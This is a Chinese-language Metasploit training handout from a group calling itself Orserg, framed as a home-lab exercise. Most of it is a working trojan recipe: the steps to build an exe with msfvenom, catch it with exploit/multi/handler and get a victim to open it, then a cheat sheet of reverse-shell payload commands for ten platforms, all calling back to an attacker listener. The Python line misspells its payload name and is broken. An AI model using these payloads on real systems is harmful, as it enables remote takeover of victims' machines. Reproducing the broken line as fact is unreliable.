Orserg 内网安全项目组官方基础训练文档 (A-7项目)
你好安全人员!我是Orserg一个高性能可开放托管组织,专针对初学安全人员提供最为简单并且完全免费的文档资料。很高兴认识你并且能让你从中学习到一些东西。如果你希望加入Orserg学到更多东西请在CSDN上搜索Orserg关注并且私信我们,我们会在第一时间接收到并且联系你。
Orserg ISPT :
Hello!内网安全实验人员。我是Orserg内网安全项目组简称ISPT,针对学习内网安全的初级A类研究人员提供较为简单的实验项目。在这2个月内你将学会并使用Metasploit的多种基础攻击技能。如信息收集、漏洞扫描、漏洞利用、攻击载荷、免杀编码和社会工程方面的简单攻击。
实验环境:
该文件的所有实验只适用于内网安全,并且所有环境均为自己搭建,包括特殊系统镜像,渗透工具、或者是虚拟机等,请确保你有搭建实验平台的条件,才能顺利完成安全实验。Orserg ISPT在模拟环境方面可能会用到Windows Server服务器或服务器搭建等多种企业环境模拟技术这些技术都会展现在内网实验环境搭建 中。
A-7-5 实际利用
使用kali快速生成简单exe木马,攻击x64位系统,对方打开木马时,成功获取meterpreter。
1. msfvenom生成木马
2. 进入到kali msfconsole
3. 调用exploit/multi/handler(监听模块)并且设置
(1) msf> use exploit/multi/handler (调用监听模块)
(2) msf> set <payload名称> (设置监听payload )
(3) msf> set LHOST 攻击者监听IP (设置攻击者监听IP)
(4) msf> set LPORT 攻击者监听端口 (设置攻击者监听端口)
(5) RUN(运行)
(6) 等待目标点开激活木马
4. 将木马复制传到目标计算机并且打开
(使用在线传输或者VM-TOLLS)
激活后
成功与目标建立连接
Tip:木马一般为两部分监听端和服务器端。监听端为exploit/multi/handler模块,服务器端为msfvenom生成的木马。当目标激活服务器端后便会反弹一个Shell会话到你的监听器上,执行任意远程命令。
A-7-6 各平台简单木马生成
安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -o ~/Desktop/test2.apk
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f macho > shell.macho
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f asp > shell.asp
ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f aspx > shell.aspx
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f raw > shell.jsp
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.85.130 LPORT=6666 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.85.130 LPORT=6666 -f raw > shell.pl
Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.85.130 LPORT=6666 -f raw > shell.py